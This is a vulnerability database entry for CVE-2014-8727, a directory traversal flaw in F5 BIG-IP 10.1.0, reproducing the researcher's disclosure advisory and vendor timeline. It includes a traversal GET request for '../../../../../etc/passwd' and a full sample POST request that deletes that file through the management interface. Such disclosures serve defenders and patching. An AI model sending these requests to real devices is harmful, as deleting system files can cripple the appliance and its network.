F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability - 知道创宇 Seebug 漏洞平台

基本字段

漏洞编号：: SSV-89443

披露/发现时间：: 2014-11-17

提交时间：: 2015-09-16

漏洞等级：

影响组件：: F5 BIG-IP Web Accelerator
(10.1.0)

漏洞作者：: 未知

提交者：: 匿名

CVE-ID：: CVE-2014-8727

CNNVD-ID：: CNNVD-201411-273

CNVD-ID：: CNVD-2014-08306

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者匿名共获得 0.15KB

Affected Product : F5 BIG-IP Vendor Homepage : http://www.f5.com/ Version : 10.1.0 Vulnerability Category : Local vulnerability Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] CVE : CVE-2014-8727 Patched : Yes An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to arbitrary enumerate files and subsequently delete them off the OS level. Any system file deletion, for instance under /etc, /boot etc would have a major functionality and operational impact for the device. An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to enumerate files on the operating system and subsequently delete them off the OS level. In order to trigger the flaw, send a HTTP GET request similar to: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd Condition: If file does not exist the application will return "File not found." If the file exists, the user can either send, a similar to, the next HTTP POST request or simply click on the Delete button through the GUI -the button will be displayed only if the enumerated file exists-. Sample HTTP POST request: POST /tmui/Control/form HTTP/1.1 <pre> Host: <ip> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?name=../../../../../etc/passwd Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 937 </pre> _form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete F5 has already patched and mitigated the issue, for more information see ID363027 at the following URL: https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13109.html https://support.f5.com/kb/en-us/products/big-ip_ltm/releasenotes/product/relnote_11_0_0_ltm.html 03-11-2014: Vendor notified at security-reporting [at] f5 [dot] com 04-11-2014: Vendor responded with intent to investigate 04-11-2014: Shared details with vendor 05-11-2014: Vendor confirmed the issue is already patched, reference ID363027 12-11-2014: Public disclosure